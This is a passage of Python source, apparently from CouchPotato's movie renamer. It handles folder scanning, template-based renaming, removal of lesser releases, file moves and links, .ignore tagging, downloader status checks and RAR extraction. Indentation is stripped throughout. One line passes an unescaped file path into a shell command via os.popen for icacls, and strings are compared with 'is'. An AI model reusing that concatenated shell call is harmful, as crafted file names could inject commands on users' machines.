if media_folder and not os.path.isdir(media_folder):
log.debug('The provided media folder %s does not exist. Trying to find it in the \'from\' folder.', media_folder)
# Update to the from folder
if len(release_download.get('files', [])) == 1:
new_media_folder = sp(from_folder)
else:
new_media_folder = sp(os.path.join(from_folder, os.path.basename(media_folder)))
if not os.path.isdir(new_media_folder):
log.error('The provided media folder %s does not exist and could also not be found in the \'from\' folder.', media_folder)
return
# Update the files
new_files = [os.path.join(new_media_folder, os.path.relpath(filename, media_folder)) for filename in release_download.get('files', [])]
if new_files and not os.path.isfile(new_files[0]):
log.error('The provided media folder %s does not exist and its files could also not be found in the \'from\' folder.', media_folder)
return
# Update release_download info to the from folder
log.debug('Release %s found in the \'from\' folder.', media_folder)
release_download['folder'] = new_media_folder
release_download['files'] = new_files
media_folder = new_media_folder
if media_folder:
for item in no_process:
if isSubFolder(item, media_folder):
log.error('To protect your data, the media libraries can\'t be inside of or the same as the provided media folder. "%s" in "%s"', (item, media_folder))
return
# Make sure a checkSnatched marked all downloads/seeds as such
if not release_download and self.conf('run_every') > 0:
self.checkSnatched(fire_scan = False)
self.renaming_started = True
# make sure the media folder name is included in the search
folder = None
files = []
if media_folder:
log.info('Scanning media folder %s...', media_folder)
folder = os.path.dirname(media_folder)
release_files = release_download.get('files', [])
if release_files:
files = release_files
# If there is only one file in the torrent, the downloader did not create a subfolder
if len(release_files) == 1:
folder = media_folder
else:
# Get all files from the specified folder
try:
for root, folders, names in os.walk(media_folder):
files.extend([sp(os.path.join(root, name)) for name in names])
except:
log.error('Failed getting files from %s: %s', (media_folder, traceback.format_exc()))
db = get_db()
# Extend the download info with info stored in the downloaded release
keep_original = self.moveTypeIsLinked()
is_torrent = False
if release_download:
release_download = self.extendReleaseDownload(release_download)
is_torrent = self.downloadIsTorrent(release_download)
keep_original = True if is_torrent and self.conf('file_action') not in ['move'] else keep_original
# Unpack any archives
extr_files = None
if self.conf('unrar'):
folder, media_folder, files, extr_files = self.extractFiles(folder = folder, media_folder = media_folder, files = files,
cleanup = self.conf('cleanup') and not keep_original)
groups = fireEvent('scanner.scan', folder = folder if folder else base_folder,
files = files, release_download = release_download, return_ignored = False, single = True) or []
folder_name = self.conf('folder_name')
file_name = self.conf('file_name')
trailer_name = self.conf('trailer_name')
nfo_name = self.conf('nfo_name')
separator = self.conf('separator')
if len(file_name) == 0:
log.error('Please fill in the filename option under renamer settings. Forcing it on <original>.<ext> to keep the same name as source file.')
file_name = '<original>.<ext>'
cd_keys = ['<cd>','<cd_nr>', '<original>']
if not any(x in folder_name for x in cd_keys) and not any(x in file_name for x in cd_keys):
log.error('Missing `cd` or `cd_nr` in the renamer. This will cause multi-file releases of being renamed to the same file. '
'Please add it in the renamer settings. Force adding it for now.')
file_name = '%s %s' % ('<cd>', file_name)
# Tag release folder as failed_rename in case no groups were found. This prevents check_snatched from removing the release from the downloader.
if not groups and self.statusInfoComplete(release_download):
self.tagRelease(release_download = release_download, tag = 'failed_rename')
for group_identifier in groups:
group = groups[group_identifier]
group['release_download'] = None
rename_files = {}
remove_files = []
remove_releases = []
media_title = getTitle(group)
# Add _UNKNOWN_ if no library item is connected
if not group.get('media') or not media_title:
self.tagRelease(group = group, tag = 'unknown')
continue
# Rename the files using the library data
else:
# Media not in library, add it first
if not group['media'].get('_id'):
group['media'] = fireEvent('movie.add', params = {
'identifier': group['identifier'],
'profile_id': None
}, search_after = False, status = 'done', single = True)
else:
group['media'] = fireEvent('movie.update', media_id = group['media'].get('_id'), single = True)
if not group['media'] or not group['media'].get('_id'):
log.error('Could not rename, no library item to work with: %s', group_identifier)
continue
media = group['media']
media_title = getTitle(media)
# Overwrite destination when set in category
destination = to_folder
category_label = ''
if media.get('category_id') and media.get('category_id') != '-1':
try:
category = db.get('id', media['category_id'])
category_label = category['label']
if category['destination'] and len(category['destination']) > 0 and category['destination'] != 'None':
destination = sp(category['destination'])
log.debug('Setting category destination for "%s": %s' % (media_title, destination))
else:
log.debug('No category destination found for "%s"' % media_title)
except:
log.error('Failed getting category label: %s', traceback.format_exc())
# Find subtitle for renaming
group['before_rename'] = []
fireEvent('renamer.before', group)
# Add extracted files to the before_rename list
if extr_files:
group['before_rename'].extend(extr_files)
# Remove weird chars from movie name
movie_name = re.sub(r"[\x00\/\\:\*\?\"<>\|]", '', media_title)
# Put 'The' at the end
name_the = movie_name
for prefix in ['the ', 'an ', 'a ']:
if prefix == movie_name[:len(prefix)].lower():
name_the = movie_name[len(prefix):] + ', ' + prefix.strip().capitalize()
break
replacements = {
'ext': 'mkv',
'namethe': name_the.strip(),
'thename': movie_name.strip(),
'year': media['info']['year'],
'first': name_the[0].upper(),
'quality': group['meta_data']['quality']['label'],
'quality_type': group['meta_data']['quality_type'],
'video': group['meta_data'].get('video'),
'audio': group['meta_data'].get('audio'),
'group': group['meta_data']['group'],
'source': group['meta_data']['source'],
'resolution_width': group['meta_data'].get('resolution_width'),
'resolution_height': group['meta_data'].get('resolution_height'),
'audio_channels': group['meta_data'].get('audio_channels'),
'imdb_id': group['identifier'],
'cd': '',
'cd_nr': '',
'mpaa': media['info'].get('mpaa', ''),
'mpaa_only': media['info'].get('mpaa', ''),
'category': category_label,
'3d': '3D' if group['meta_data']['quality'].get('is_3d', 0) else '',
'3d_type': group['meta_data'].get('3d_type'),
}
if replacements['mpaa_only'] not in ('G', 'PG', 'PG-13', 'R', 'NC-17'):
replacements['mpaa_only'] = 'Not Rated'
for file_type in group['files']:
# Move nfo depending on settings
if file_type is 'nfo' and not self.conf('rename_nfo'):
log.debug('Skipping, renaming of %s disabled', file_type)
for current_file in group['files'][file_type]:
if self.conf('cleanup') and (not keep_original or self.fileIsAdded(current_file, group)):
remove_files.append(current_file)
continue
# Subtitle extra
if file_type is 'subtitle_extra':
continue
# Move other files
multiple = len(group['files'][file_type]) > 1 and not group['is_dvd']
cd = 1 if multiple else 0
for current_file in sorted(list(group['files'][file_type])):
current_file = sp(current_file)
# Original filename
replacements['original'] = os.path.splitext(os.path.basename(current_file))[0]
replacements['original_folder'] = fireEvent('scanner.remove_cptag', group['dirname'], single = True)
if not replacements['original_folder'] or len(replacements['original_folder']) == 0:
replacements['original_folder'] = replacements['original']
# Extension
replacements['ext'] = getExt(current_file)
# cd #
replacements['cd'] = ' cd%d' % cd if multiple else ''
replacements['cd_nr'] = cd if multiple else ''
# Naming
final_folder_name = self.doReplace(folder_name, replacements, folder = True)
final_file_name = self.doReplace(file_name, replacements)
replacements['filename'] = final_file_name[:-(len(getExt(final_file_name)) + 1)]
# Meta naming
if file_type is 'trailer':
final_file_name = self.doReplace(trailer_name, replacements, remove_multiple = True)
elif file_type is 'nfo':
final_file_name = self.doReplace(nfo_name, replacements, remove_multiple = True)
# Move DVD files (no structure renaming)
if group['is_dvd'] and file_type is 'movie':
found = False
for top_dir in ['video_ts', 'audio_ts', 'bdmv', 'certificate']:
has_string = current_file.lower().find(os.path.sep + top_dir + os.path.sep)
if has_string >= 0:
structure_dir = current_file[has_string:].lstrip(os.path.sep)
rename_files[current_file] = os.path.join(destination, final_folder_name, structure_dir)
found = True
break
if not found:
log.error('Could not determine dvd structure for: %s', current_file)
# Do rename others
else:
if file_type is 'leftover':
if self.conf('move_leftover'):
rename_files[current_file] = os.path.join(destination, final_folder_name, os.path.basename(current_file))
elif file_type not in ['subtitle']:
rename_files[current_file] = os.path.join(destination, final_folder_name, final_file_name)
# Check for extra subtitle files
if file_type is 'subtitle':
remove_multiple = False
if len(group['files']['movie']) == 1:
remove_multiple = True
sub_langs = group['subtitle_language'].get(current_file, [])
# rename subtitles with or without language
sub_name = self.doReplace(file_name, replacements, remove_multiple = remove_multiple)
rename_files[current_file] = os.path.join(destination, final_folder_name, sub_name)
rename_extras = self.getRenameExtras(
extra_type = 'subtitle_extra',
replacements = replacements,
folder_name = folder_name,
file_name = file_name,
destination = destination,
group = group,
current_file = current_file,
remove_multiple = remove_multiple,
)
# Don't add language if multiple languages in 1 subtitle file
if len(sub_langs) == 1:
sub_suffix = '%s.%s' % (sub_langs[0], replacements['ext'])
# Don't add language to subtitle file it it's already there
if not sub_name.endswith(sub_suffix):
sub_name = sub_name.replace(replacements['ext'], sub_suffix)
rename_files[current_file] = os.path.join(destination, final_folder_name, sub_name)
rename_files = mergeDicts(rename_files, rename_extras)
# Filename without cd etc
elif file_type is 'movie':
rename_extras = self.getRenameExtras(
extra_type = 'movie_extra',
replacements = replacements,
folder_name = folder_name,
file_name = file_name,
destination = destination,
group = group,
current_file = current_file
)
rename_files = mergeDicts(rename_files, rename_extras)
group['filename'] = self.doReplace(file_name, replacements, remove_multiple = True)[:-(len(getExt(final_file_name)) + 1)]
group['destination_dir'] = os.path.join(destination, final_folder_name)
if multiple:
cd += 1
# Before renaming, remove the lower quality files
remove_leftovers = True
# Get media quality profile
profile = None
if media.get('profile_id'):
try:
profile = db.get('id', media['profile_id'])
except:
# Set profile to None as it does not exist anymore
mdia = db.get('id', media['_id'])
mdia['profile_id'] = None
db.update(mdia)
log.error('Error getting quality profile for %s: %s', (media_title, traceback.format_exc()))
else:
log.debug('Media has no quality profile: %s', media_title)
# Mark media for dashboard
mark_as_recent = False
# Go over current movie releases
for release in fireEvent('release.for_media', media['_id'], single = True):
# When a release already exists
if release.get('status') == 'done':
# This is where CP removes older, lesser quality releases or releases that are not wanted anymore
is_higher = fireEvent('quality.ishigher', \
group['meta_data']['quality'], {'identifier': release['quality'], 'is_3d': release.get('is_3d', False)}, profile, single = True)
if is_higher == 'higher':
log.info('Removing lesser or not wanted quality %s for %s.', (media_title, release.get('quality')))
for file_type in release.get('files', {}):
for release_file in release['files'][file_type]:
remove_files.append(release_file)
remove_releases.append(release)
# Same quality, but still downloaded, so maybe repack/proper/unrated/directors cut etc
elif is_higher == 'equal':
log.info('Same quality release already exists for %s, with quality %s. Assuming repack.', (media_title, release.get('quality')))
for file_type in release.get('files', {}):
for release_file in release['files'][file_type]:
remove_files.append(release_file)
remove_releases.append(release)
# Downloaded a lower quality, rename the newly downloaded files/folder to exclude them from scan
else:
log.info('Better quality release already exists for %s, with quality %s', (media_title, release.get('quality')))
# Add exists tag to the .ignore file
self.tagRelease(group = group, tag = 'exists')
# Notify on rename fail
download_message = 'Renaming of %s (%s) cancelled, exists in %s already.' % (media_title, group['meta_data']['quality']['label'], release.get('quality'))
fireEvent('movie.renaming.canceled', message = download_message, data = group)
remove_leftovers = False
break
elif release.get('status') in ['snatched', 'seeding']:
if release_download and release_download.get('release_id'):
if release_download['release_id'] == release['_id']:
if release_download['status'] == 'completed':
# Set the release to downloaded
fireEvent('release.update_status', release['_id'], status = 'downloaded', single = True)
group['release_download'] = release_download
mark_as_recent = True
elif release_download['status'] == 'seeding':
# Set the release to seeding
fireEvent('release.update_status', release['_id'], status = 'seeding', single = True)
mark_as_recent = True
elif release.get('quality') == group['meta_data']['quality']['identifier']:
# Set the release to downloaded
fireEvent('release.update_status', release['_id'], status = 'downloaded', single = True)
group['release_download'] = release_download
mark_as_recent = True
# Mark media for dashboard
if mark_as_recent:
fireEvent('media.tag', group['media'].get('_id'), 'recent', update_edited = True, single = True)
# Remove leftover files
if not remove_leftovers: # Don't remove anything
continue
log.debug('Removing leftover files')
for current_file in group['files']['leftover']:
if self.conf('cleanup') and not self.conf('move_leftover') and \
(not keep_original or self.fileIsAdded(current_file, group)):
remove_files.append(current_file)
if self.conf('check_space'):
total_space, available_space = getFreeSpace(destination)
renaming_size = getSize(rename_files.keys())
if renaming_size > available_space:
log.error('Not enough space left, need %s MB but only %s MB available', (renaming_size, available_space))
self.tagRelease(group = group, tag = 'not_enough_space')
continue
# Remove files
delete_folders = []
for src in remove_files:
if rename_files.get(src):
log.debug('Not removing file that will be renamed: %s', src)
continue
log.info('Removing "%s"', src)
try:
src = sp(src)
if os.path.isfile(src):
os.remove(src)
parent_dir = os.path.dirname(src)
if parent_dir not in delete_folders and os.path.isdir(parent_dir) and \
not isSubFolder(destination, parent_dir) and not isSubFolder(media_folder, parent_dir) and \
isSubFolder(parent_dir, base_folder):
delete_folders.append(parent_dir)
except:
log.error('Failed removing %s: %s', (src, traceback.format_exc()))
self.tagRelease(group = group, tag = 'failed_remove')
# Delete leftover folder from older releases
delete_folders = sorted(delete_folders, key = len, reverse = True)
for delete_folder in delete_folders:
try:
self.deleteEmptyFolder(delete_folder, show_error = False)
except Exception as e:
log.error('Failed to delete folder: %s %s', (e, traceback.format_exc()))
# Rename all files marked
group['renamed_files'] = []
failed_rename = False
for src in rename_files:
if rename_files[src]:
dst = rename_files[src]
if dst in group['renamed_files']:
log.error('File "%s" already renamed once, adding random string at the end to prevent data loss', dst)
dst = '%s.random-%s' % (dst, randomString())
# Create dir
self.makeDir(os.path.dirname(dst))
try:
self.moveFile(src, dst, use_default = not is_torrent or self.fileIsAdded(src, group))
group['renamed_files'].append(dst)
except:
log.error('Failed renaming the file "%s" : %s', (os.path.basename(src), traceback.format_exc()))
failed_rename = True
break
# If renaming failed tag the release folder as failed and continue with next group. Note that all old files have already been deleted.
if failed_rename:
self.tagRelease(group = group, tag = 'failed_rename')
continue
# If renaming succeeded, make sure it is not tagged as failed (scanner didn't return a group, but a download_ID was provided in an earlier attempt)
else:
self.untagRelease(group = group, tag = 'failed_rename')
# Tag folder if it is in the 'from' folder and it will not be removed because it is a torrent
if self.movieInFromFolder(media_folder) and keep_original:
self.tagRelease(group = group, tag = 'renamed_already')
# Remove matching releases
for release in remove_releases:
log.debug('Removing release %s', release.get('identifier'))
try:
db.delete(release)
except:
log.error('Failed removing %s: %s', (release, traceback.format_exc()))
if group['dirname'] and group['parentdir'] and not keep_original:
if media_folder:
# Delete the movie folder
group_folder = media_folder
else:
# Delete the first empty subfolder in the tree relative to the 'from' folder
group_folder = sp(os.path.join(base_folder, os.path.relpath(group['parentdir'], base_folder).split(os.path.sep)[0]))
try:
if self.conf('cleanup') or self.conf('move_leftover'):
log.info('Deleting folder: %s', group_folder)
self.deleteEmptyFolder(group_folder)
except:
log.error('Failed removing %s: %s', (group_folder, traceback.format_exc()))
# Notify on download, search for trailers etc
download_message = 'Downloaded %s (%s%s)' % (media_title, replacements['quality'], (' ' + replacements['3d']) if replacements['3d'] else '')
try:
fireEvent('renamer.after', message = download_message, group = group, in_order = True)
except:
log.error('Failed firing (some) of the renamer.after events: %s', traceback.format_exc())
# Break if CP wants to shut down
if self.shuttingDown():
break
self.renaming_started = False
def getRenameExtras(self, extra_type = '', replacements = None, folder_name = '', file_name = '', destination = '', group = None, current_file = '', remove_multiple = False):
if not group: group = {}
if not replacements: replacements = {}
replacements = replacements.copy()
rename_files = {}
def test(s):
return current_file[:-len(replacements['ext'])] in sp(s)
for extra in set(filter(test, group['files'][extra_type])):
replacements['ext'] = getExt(extra)
final_folder_name = self.doReplace(folder_name, replacements, remove_multiple = remove_multiple, folder = True)
final_file_name = self.doReplace(file_name, replacements, remove_multiple = remove_multiple)
rename_files[extra] = os.path.join(destination, final_folder_name, final_file_name)
return rename_files
# This adds a file to ignore / tag a release so it is ignored later
def tagRelease(self, tag, group = None, release_download = None):
if not tag:
return
text = """This file is from CouchPotato
It has marked this release as "%s"
This file hides the release from the renamer
Remove it if you want it to be renamed (again, or at least let it try again)
""" % tag
tag_files = []
# Tag movie files if they are known
if isinstance(group, dict):
tag_files = [sorted(list(group['files']['movie']))[0]]
elif isinstance(release_download, dict):
# Tag download_files if they are known
if release_download.get('files', []):
tag_files = [filename for filename in release_download.get('files', []) if os.path.exists(filename)]
# Tag all files in release folder
elif release_download['folder']:
for root, folders, names in os.walk(sp(release_download['folder'])):
tag_files.extend([os.path.join(root, name) for name in names])
for filename in tag_files:
# Don't tag .ignore files
if os.path.splitext(filename)[1] == '.ignore':
continue
tag_filename = '%s.%s.ignore' % (os.path.splitext(filename)[0], tag)
if not os.path.isfile(tag_filename):
self.createFile(tag_filename, text)
def untagRelease(self, group = None, release_download = None, tag = ''):
if not release_download:
return
tag_files = []
folder = None
# Tag movie files if they are known
if isinstance(group, dict):
tag_files = [sorted(list(group['files']['movie']))[0]]
folder = sp(group['parentdir'])
if not group.get('dirname') or not os.path.isdir(folder):
return False
elif isinstance(release_download, dict):
folder = sp(release_download['folder'])
if not os.path.isdir(folder):
return False
# Untag download_files if they are known
if release_download.get('files'):
tag_files = release_download.get('files', [])
# Untag all files in release folder
else:
for root, folders, names in os.walk(folder):
tag_files.extend([sp(os.path.join(root, name)) for name in names if not os.path.splitext(name)[1] == '.ignore'])
if not folder:
return False
# Find all .ignore files in folder
ignore_files = []
for root, dirnames, filenames in os.walk(folder):
ignore_files.extend(fnmatch.filter([sp(os.path.join(root, filename)) for filename in filenames], '*%s.ignore' % tag))
# Match all found ignore files with the tag_files and delete if found
for tag_file in tag_files:
ignore_file = fnmatch.filter(ignore_files, fnEscape('%s.%s.ignore' % (os.path.splitext(tag_file)[0], tag if tag else '*')))
for filename in ignore_file:
try:
os.remove(filename)
except:
log.debug('Unable to remove ignore file: %s. Error: %s.' % (filename, traceback.format_exc()))
def hastagRelease(self, release_download, tag = ''):
if not release_download:
return False
folder = sp(release_download['folder'])
if not os.path.isdir(folder):
return False
tag_files = []
ignore_files = []
# Find tag on download_files if they are known
if release_download.get('files'):
tag_files = release_download.get('files', [])
# Find tag on all files in release folder
else:
for root, folders, names in os.walk(folder):
tag_files.extend([sp(os.path.join(root, name)) for name in names if not os.path.splitext(name)[1] == '.ignore'])
# Find all .ignore files in folder
for root, dirnames, filenames in os.walk(folder):
ignore_files.extend(fnmatch.filter([sp(os.path.join(root, filename)) for filename in filenames], '*%s.ignore' % tag))
# Match all found ignore files with the tag_files and return True found
for tag_file in tag_files:
ignore_file = fnmatch.filter(ignore_files, fnEscape('%s.%s.ignore' % (os.path.splitext(tag_file)[0], tag if tag else '*')))
if ignore_file:
return True
return False
def moveFile(self, old, dest, use_default = False):
dest = sp(dest)
try:
if os.path.exists(dest) and os.path.isfile(dest):
raise Exception('Destination "%s" already exists' % dest)
move_type = self.conf('file_action')
if use_default:
move_type = self.conf('default_file_action')
if move_type not in ['copy', 'link']:
try:
log.info('Moving "%s" to "%s"', (old, dest))
shutil.move(old, dest)
except:
exists = os.path.exists(dest)
if exists and os.path.getsize(old) == os.path.getsize(dest):
log.error('Successfully moved file "%s", but something went wrong: %s', (dest, traceback.format_exc()))
os.unlink(old)
else:
# remove faultly copied file
if exists:
os.unlink(dest)
raise
elif move_type == 'copy':
log.info('Copying "%s" to "%s"', (old, dest))
shutil.copy(old, dest)
else:
log.info('Linking "%s" to "%s"', (old, dest))
# First try to hardlink
try:
log.debug('Hardlinking file "%s" to "%s"...', (old, dest))
link(old, dest)
except:
# Try to simlink next
log.debug('Couldn\'t hardlink file "%s" to "%s". Symlinking instead. Error: %s.', (old, dest, traceback.format_exc()))
shutil.copy(old, dest)
try:
old_link = '%s.link' % sp(old)
symlink(dest, old_link)
os.unlink(old)
os.rename(old_link, old)
except:
log.error('Couldn\'t symlink file "%s" to "%s". Copied instead. Error: %s. ', (old, dest, traceback.format_exc()))
try:
os.chmod(dest, Env.getPermission('file'))
if os.name == 'nt' and self.conf('ntfs_permission'):
os.popen('icacls "' + dest + '"* /reset /T')
except:
log.debug('Failed setting permissions for file: %s, %s', (dest, traceback.format_exc(1)))
except:
log.error('Couldn\'t move file "%s" to "%s": %s', (old, dest, traceback.format_exc()))
raise
return True
def doReplace(self, string, replacements, remove_multiple = False, folder = False):
"""
replace confignames with the real thing
"""
replacements = replacements.copy()
if remove_multiple:
replacements['cd'] = ''
replacements['cd_nr'] = ''
replaced = toUnicode(string)
for x, r in replacements.items():
if x in ['thename', 'namethe']:
continue
if r is not None:
replaced = replaced.replace(six.u('<%s>') % toUnicode(x), toUnicode(r))
else:
#If information is not available, we don't want the tag in the filename
replaced = replaced.replace('<' + x + '>', '')
if self.conf('replace_doubles'):
replaced = self.replaceDoubles(replaced.lstrip('. '))
for x, r in replacements.items():
if x in ['thename', 'namethe']:
replaced = replaced.replace(six.u('<%s>') % toUnicode(x), toUnicode(r))
replaced = re.sub(r"[\x00:\*\?\"<>\|]", '', replaced)
sep = self.conf('foldersep') if folder else self.conf('separator')
return ss(replaced.replace(' ', ' ' if not sep else sep))
def replaceDoubles(self, string):
replaces = [
('\.+', '.'), ('_+', '_'), ('-+', '-'), ('\s+', ' '), (' \\\\', '\\\\'), (' /', '/'),
('(\s\.)+', '.'), ('(-\.)+', '.'), ('(\s-)+', '-'),
]
for r in replaces:
reg, replace_with = r
string = re.sub(reg, replace_with, string)
string = string.rstrip(',_-/\\ ')
return string
def checkSnatched(self, fire_scan = True):
if self.checking_snatched:
log.debug('Already checking snatched')
return False
self.checking_snatched = True
try:
db = get_db()
rels = list(fireEvent('release.with_status', ['snatched', 'seeding', 'missing'], single = True))
if not rels:
#No releases found that need status checking
self.checking_snatched = False
return True
# Collect all download information with the download IDs from the releases
download_ids = []
no_status_support = []
try:
for rel in rels:
if not rel.get('download_info'): continue
if rel['download_info'].get('id') and rel['download_info'].get('downloader'):
download_ids.append(rel['download_info'])
ds = rel['download_info'].get('status_support')
if ds is False or ds == 'False':
no_status_support.append(ss(rel['download_info'].get('downloader')))
except:
log.error('Error getting download IDs from database')
self.checking_snatched = False
return False
release_downloads = fireEvent('download.status', download_ids, merge = True) if download_ids else []
if len(no_status_support) > 0:
log.debug('Download status functionality is not implemented for one of the active downloaders: %s', list(set(no_status_support)))
if not release_downloads:
if fire_scan:
self.scan()
self.checking_snatched = False
return True
scan_releases = []
scan_required = False
log.debug('Checking status snatched releases...')
try:
for rel in rels:
if not rel.get('media_id'): continue
movie_dict = db.get('id', rel.get('media_id'))
download_info = rel.get('download_info')
if not isinstance(download_info, dict):
log.error('Faulty release found without any info, ignoring.')
fireEvent('release.update_status', rel.get('_id'), status = 'ignored', single = True)
continue
# Check if download ID is available
if not download_info.get('id') or not download_info.get('downloader'):
log.debug('Download status functionality is not implemented for downloader (%s) of release %s.', (download_info.get('downloader', 'unknown'), rel['info']['name']))
scan_required = True
# Continue with next release
continue
# Find release in downloaders
nzbname = self.createNzbName(rel['info'], movie_dict)
found_release = False
for release_download in release_downloads:
found_release = False
if download_info.get('id'):
if release_download['id'] == download_info['id'] and release_download['downloader'] == download_info['downloader']:
log.debug('Found release by id: %s', release_download['id'])
found_release = True
break
else:
if release_download['name'] == nzbname or rel['info']['name'] in release_download['name'] or getImdb(release_download['name']) == getIdentifier(movie_dict):
log.debug('Found release by release name or imdb ID: %s', release_download['name'])
found_release = True
break
if not found_release:
log.info('%s not found in downloaders', nzbname)
#Check status if already missing and for how long, if > 1 week, set to ignored else to missing
if rel.get('status') == 'missing':
if rel.get('last_edit') < int(time.time()) - 7 * 24 * 60 * 60:
fireEvent('release.update_status', rel.get('_id'), status = 'ignored', single = True)
else:
# Set the release to missing
fireEvent('release.update_status', rel.get('_id'), status = 'missing', single = True)
# Continue with next release
continue
# Log that we found the release
timeleft = 'N/A' if release_download['timeleft'] == -1 else release_download['timeleft']
log.debug('Found %s: %s, time to go: %s', (release_download['name'], release_download['status'].upper(), timeleft))
# Check status of release
if release_download['status'] == 'busy':
# Set the release to snatched if it was missing before
fireEvent('release.update_status', rel.get('_id'), status = 'snatched', single = True)
# Tag folder if it is in the 'from' folder and it will not be processed because it is still downloading
if self.movieInFromFolder(release_download['folder']):
self.tagRelease(release_download = release_download, tag = 'downloading')
elif release_download['status'] == 'seeding':
#If linking setting is enabled, process release
if self.conf('file_action') != 'move' and not rel.get('status') == 'seeding' and self.statusInfoComplete(release_download):
log.info('Download of %s completed! It is now being processed while leaving the original files alone for seeding. Current ratio: %s.', (release_download['name'], release_download['seed_ratio']))
# Remove the downloading tag
self.untagRelease(release_download = release_download, tag = 'downloading')
# Scan and set the torrent to paused if required
release_download.update({'pause': True, 'scan': True, 'process_complete': False})
scan_releases.append(release_download)
else:
#let it seed
log.debug('%s is seeding with ratio: %s', (release_download['name'], release_download['seed_ratio']))
# Set the release to seeding
fireEvent('release.update_status', rel.get('_id'), status = 'seeding', single = True)
elif release_download['status'] == 'failed':
# Set the release to failed
fireEvent('release.update_status', rel.get('_id'), status = 'failed', single = True)
fireEvent('download.remove_failed', release_download, single = True)
if self.conf('next_on_failed'):
fireEvent('movie.searcher.try_next_release', media_id = rel.get('media_id'))
elif release_download['status'] == 'completed':
log.info('Download of %s completed!', release_download['name'])
#Make sure the downloader sent over a path to look in
if self.statusInfoComplete(release_download):
# If the release has been seeding, process now the seeding is done
if rel.get('status') == 'seeding':
if self.conf('file_action') != 'move':
# Set the release to done as the movie has already been renamed
fireEvent('release.update_status', rel.get('_id'), status = 'downloaded', single = True)
# Allow the downloader to clean-up
release_download.update({'pause': False, 'scan': False, 'process_complete': True})
scan_releases.append(release_download)
else:
# Scan and Allow the downloader to clean-up
release_download.update({'pause': False, 'scan': True, 'process_complete': True})
scan_releases.append(release_download)
else:
# Set the release to snatched if it was missing before
fireEvent('release.update_status', rel.get('_id'), status = 'snatched', single = True)
# Remove the downloading tag
self.untagRelease(release_download = release_download, tag = 'downloading')
# Scan and Allow the downloader to clean-up
release_download.update({'pause': False, 'scan': True, 'process_complete': True})
scan_releases.append(release_download)
else:
scan_required = True
except:
log.error('Failed checking for release in downloader: %s', traceback.format_exc())
# The following can either be done here, or inside the scanner if we pass it scan_items in one go
for release_download in scan_releases:
# Ask the renamer to scan the item
if release_download['scan']:
if release_download['pause'] and self.conf('file_action') == 'link':
fireEvent('download.pause', release_download = release_download, pause = True, single = True)
self.scan(release_download = release_download)
if release_download['pause'] and self.conf('file_action') == 'link':
fireEvent('download.pause', release_download = release_download, pause = False, single = True)
if release_download['process_complete']:
# First make sure the files were successfully processed
if not self.hastagRelease(release_download = release_download, tag = 'failed_rename'):
# Remove the seeding tag if it exists
self.untagRelease(release_download = release_download, tag = 'renamed_already')
# Ask the downloader to process the item
fireEvent('download.process_complete', release_download = release_download, single = True)
if fire_scan and (scan_required or len(no_status_support) > 0):
self.scan()
self.checking_snatched = False
return True
except:
log.error('Failed checking snatched: %s', traceback.format_exc())
self.checking_snatched = False
return False
def extendReleaseDownload(self, release_download):
rls = None
db = get_db()
if release_download and release_download.get('id'):
try:
rls = db.get('release_download', '%s-%s' % (release_download.get('downloader'), release_download.get('id')), with_doc = True)['doc']
except:
log.error('Download ID %s from downloader %s not found in releases', (release_download.get('id'), release_download.get('downloader')))
if rls:
media = db.get('id', rls['media_id'])
release_download.update({
'imdb_id': getIdentifier(media),
'quality': rls['quality'],
'is_3d': rls['is_3d'],
'protocol': rls.get('info', {}).get('protocol') or rls.get('info', {}).get('type'),
'release_id': rls['_id'],
})
return release_download
def downloadIsTorrent(self, release_download):
return release_download and release_download.get('protocol') in ['torrent', 'torrent_magnet']
def fileIsAdded(self, src, group):
if not group or not group.get('before_rename'):
return False
return src in group['before_rename']
def moveTypeIsLinked(self):
return self.conf('default_file_action') in ['copy', 'link']
def statusInfoComplete(self, release_download):
return release_download.get('id') and release_download.get('downloader') and release_download.get('folder')
def movieInFromFolder(self, media_folder):
return media_folder and isSubFolder(media_folder, sp(self.conf('from'))) or not media_folder
def extractFiles(self, folder = None, media_folder = None, files = None, cleanup = False):
if not files: files = []
# RegEx for finding rar files
archive_regex = '(?P<file>^(?P<base>(?:(?!\.part\d+\.rar$).)*)\.(?:(?:part0*1\.)?rar)$)'
restfile_regex = '(^%s\.(?:part(?!0*1\.rar$)\d+\.rar$|[rstuvw]\d+$))'
extr_files = []
from_folder = sp(self.conf('from'))
# Check input variables
if not folder:
folder = from_folder
check_file_date = True
if media_folder:
check_file_date = False
if not files:
for root, folders, names in os.walk(folder):
files.extend([sp(os.path.join(root, name)) for name in names])
# Find all archive files
archives = [re.search(archive_regex, name).groupdict() for name in files if re.search(archive_regex, name)]
#Extract all found archives
for archive in archives:
# Check if it has already been processed by CPS
if self.hastagRelease(release_download = {'folder': os.path.dirname(archive['file']), 'files': archive['file']}):
continue
# Find all related archive files
archive['files'] = [name for name in files if re.search(restfile_regex % re.escape(archive['base']), name)]
archive['files'].append(archive['file'])
# Check if archive is fresh and maybe still copying/moving/downloading, ignore files newer than 1 minute
if check_file_date:
files_too_new, time_string = self.checkFilesChanged(archive['files'])
if files_too_new:
log.info('Archive seems to be still copying/moving/downloading or just copied/moved/downloaded (created on %s), ignoring for now: %s', (time_string, os.path.basename(archive['file'])))
continue
log.info('Archive %s found. Extracting...', os.path.basename(archive['file']))
try:
unrar_path = self.conf('unrar_path')
unrar_path = unrar_path if unrar_path and (os.path.isfile(unrar_path) or re.match('^[a-zA-Z0-9_/\.\-]+$', unrar_path)) else None
rar_handle = RarFile(archive['file'], custom_path = unrar_path)
extr_path = os.path.join(from_folder, os.path.relpath(os.path.dirname(archive['file']), folder))
self.makeDir(extr_path)
for packedinfo in rar_handle.infolist():
extr_file_path = sp(os.path.join(extr_path, os.path.basename(packedinfo.filename)))
if not packedinfo.isdir and not os.path.isfile(extr_file_path):
log.debug('Extracting %s...', packedinfo.filename)
rar_handle.extract(condition = [packedinfo.index], path = extr_path, withSubpath = False, overwrite = False)
if self.conf('unrar_modify_date'):
try:
os.utime(extr_file_path, (os.path.getatime(archive['file']), os.path.getmtime(archive['file'])))
except:
log.error('Rar modify date enabled, but failed: %s', traceback.format_exc())
extr_files.append(extr_file_path)
del rar_handle
except Exception as e:
log.error('Failed to extract %s: %s %s', (archive['file'], e, traceback.format_exc()))
continue
# Delete the archive files
for filename in archive['files']:
if cleanup:
try:
os.remove(filename)
except Exception as e:
log.error('Failed to remove %s: %s %s', (filename, e, traceback.format_exc()))
continue
files.remove(filename)
# Move the rest of the files and folders if any files are extracted to the from folder (only if folder was provided)
if extr_files and folder != from_folder:
for leftoverfile in list(files):
